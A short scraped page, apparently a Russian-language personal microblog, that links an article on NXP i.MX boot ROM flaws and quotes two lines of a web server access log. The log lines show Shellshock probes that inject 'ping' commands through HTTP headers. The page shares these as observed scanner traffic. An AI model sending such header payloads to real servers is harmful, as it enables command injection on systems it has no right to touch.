https://blog.quarkslab.com/vulnerabilities-in-high-assurance-boot-of-nxp-imx-microprocessors.html
tldr: buffer overflow в запиханом в кремний коде начального бутлоадера, проверяющем подписи.
УНЯНЯ. У нас есть немножечко инфы
об этом пользователе. Мы знаем, что он понаписал,
порекомендовал и даже и то и другое сразу.
А ещё у нас есть RSS.
> grep '()\s*{' /var/log/lighttpd/access.log
209.126.230.72 - - [25/Sep/2014:06:02:49 +0400] "GET / HTTP/1.0" 400 349 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:10:54:19 +0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
Цоперайт © 2010-2016 @stiletto.